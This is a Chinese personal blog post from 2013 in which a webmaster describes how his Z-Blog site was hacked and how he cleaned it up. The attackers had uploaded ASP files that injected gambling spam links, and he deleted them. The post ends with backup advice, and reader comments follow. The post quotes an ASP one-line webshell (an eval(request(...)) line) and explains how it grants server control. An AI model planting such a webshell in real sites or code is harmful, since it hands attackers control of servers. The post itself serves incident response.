【通知】
             
当前位置:首页 > 网赚杂谈 > 正文内容

爱小志博客网站被黑及其应对

2013-04-15 | 分类:网赚杂谈 | 评论:11人 | 浏览:1,164次

今天中午12点多用手机访问我的网站还是好好的,等到下午4点多来打开网站的时候,发现网站打开之后,页面错位乱码,原来是网站被黑客攻击了,于是,我立刻用FTP软件登录虚拟主机空间,并且,按照时间顺序排列文件。发现果然不对劲,有人在我虚拟主机空间上传了一个index.asp文件,然后我查看z-blog 2.1原版源码程序,发现并没有index.asp文件,所以,我断定,这个肯定是黑客上传上上去的,于是,我把这个文件立刻删除了,在访问网站的时候,果然能够正常访问了。另外,我看见还有一个文件夹名称为“inc”,其日期是今天最新的日期,我打开进入,发现里面有一个文件名称是coon.asp,但是,我查看原版的z-blog程序,发现并没有一个文件夹是inc,所以,我就果断把这个文件删除了。

下面图片是我网站被攻击之后打开的页面:

image

我们发现,其中有一些乱码的字符,比如“��?”,“br>”等等,之后,我又查看了网页的源代码,发现在代码的底部,挂的全部都是“博彩”和“赌场”的网站广告代码,

image

这个情况,应该说我不是第一次遇见了,但是,网站打开之后是乱码的情况还是第一次出现,以前我有个网站也是挂的什么淘宝商城或者是什么医疗机构,或者是什么博彩网站的广告,但是都是隐藏起来的网站链接和代码,一般我们直接打开网站之后不能直接看见这些链接,所以,我们也通常很难发现这些恶意广告链接,这些隐藏的恶意链接,很容易造成我们网站被百度,谷歌等网站降权,甚至网站被K,所以,我们需要经常查看自己的网站首页源码,最好是下载查看和分析网站日志。

另外,我通过把inc文件夹里面的的conn.asp文件下载到本地,用记事本打开之后,发现里面的代码只有一段,如下图:

image

我们通过在百度搜索这段代码,发现果然有很多网站有被挂上这段代码:

image

而且,很多挂上这个代码的,都是网站的首页标题,不得不说,网站管理员到底干哈去了?

爱小志估计代码中的“qweqwe1”应该是一个人的网络用户名,于是我们在百度搜索qweqwe1:

image

发现用户名称带有“qweqwe1”字符的果然不在少数,光搜索结果就达到了2万多条,这说明,用户名为qweqwe1的黑客真的是很嚣张!

还有,我们搜索“eval request”果然真相浮出了水面:

image

答案是“<% eval(request("#"))%>这句话是一句话小马的服务端,入侵者能利用lake2的客户端进行连接,从而得到一个网站的最高权限,更甚至,拿下这台服务器,注意站点的安全了lz”,黑客已经拿到了网站的服务器控制端。

通过这些分析,我们已经大概知道了网站服务器的问题,所以,爱小志认为,作为站长的我们,需要加强网站的安全的管理,就像这篇文章所说的《关于网赚——我想对大家说的》“黑客可以决定一个网站的生存”,所以,作为站长,尤其是个人站长的我们,需要经常对网站进行备份,备份最好是对整站进行备份,如果可以,每天都需要备份一次数据库,每周备份一次网站所有文件。备份其实很简单,只需用FTP软件登录网站虚拟主机空间,下载mdb数据库即可,其中,z-blog的数据库文件路径为:zb_users\DATA\***.mdb,其中***为您数据库的文件名称。

后记:作为个人站长其实很不容易,树大招风,何况爱小志这棵树还没有“发芽”,几乎就要被黑客扼杀在襁褓之中,究竟是爱小志得罪了各位,还是各位竞争对手网站看不惯爱小志博客呢?

另外,如果您有更好的应对措施,可以在下方给我们留言,谢谢!

来源:爱小志博客(QQ号:791911607),转载请注明出处,谢谢!

支付宝免费扫码领红包

  • 评论:(11)

已有 11 位网友发表了一针见血的评论,你还等什么?

◎欢迎大家参与讨论

  1. Post:2013/04/15 19:28:04

    我说下午来你的博客 怎么是这样呢 以为是 主机有啥问题呢 呵呵

  2. Post:2013/04/15 22:18:33

    还好及时发现了,要么百度收录猛增,都不知道怎么回事,原来都给别人做宣传了。

  3. Post:2013/04/15 22:22:27

    您知道有啥防黑技巧吗?

  4. Post:2013/04/15 22:29:01

    来问候下。

  5. Post:2013/04/15 23:16:43

    很好的经验,以后自己也嫩个多多防范呢

  6. Post:2013/04/16 14:34:13

    恩恩,多多积累经验!

  7. Post:2013/04/17 22:51:50

    7年前就玩过一句话木马,到今天了还存在呢。qweqwe1只是发送的一个变量。如果这个变量是一句sql语句,如select * from users那么所有的用户名和密码都会显示出来。

  8. Post:2013/04/18 07:03:18

    那站点是如何防止呢?

  9. Post:2013/04/19 09:26:50

    要不是今天来你的博客看看,我还不知道我的网站被黑了,网站底部出现很多百家乐等广告,我以为是系统临时添加的,结果FXP查看下发现和你的一样,有个文件被修改过,日期在三月底,坑爹啊!!!赶紧删除,再把那个文件上传。接着修改FXP密码空间登录密码,我擦,这事我都能碰见!

  10. Post:2013/04/19 16:17:41

    以后日子还长着呢!要多多注意!

  11. Post:2013/04/19 22:10:25

    具体怎么得到权限有很多方法和漏洞,一时也说不完,我原来玩黑客的时候就是因为想象空间非常大,各种意想不到的技术层出不穷。这个要具体分析的,你要搞更多的资料分析。

站内搜索